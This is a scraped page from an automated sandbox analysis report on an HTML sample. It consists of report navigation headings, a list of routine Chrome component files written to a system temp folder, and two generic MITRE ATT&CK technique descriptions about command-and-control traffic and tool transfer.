Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report .html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1142903608\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1142903608\history_search_strings_farmhashed.binarypb

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1142903608\manifest.fingerprint

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1142903608\manifest.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1181785141\Google.Widevine.CDM.dll

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1181785141\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1181785141\manifest.fingerprint

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1181785141\manifest.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1249102660\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1249102660\cr_en-us_500000_index.bin

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1249102660\manifest.fingerprint

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1249102660\manifest.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1434875442\Filtering Rules

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1434875442\LICENSE.txt

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1434875442\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1434875442\manifest.fingerprint

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1434875442\manifest.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1601075502\LICENSE

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1601075502\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1601075502\keys.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1601075502\manifest.fingerprint

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1601075502\manifest.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_677949319\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_677949319\manifest.fingerprint

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_677949319\manifest.json

Windows Analysis Report
.html

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre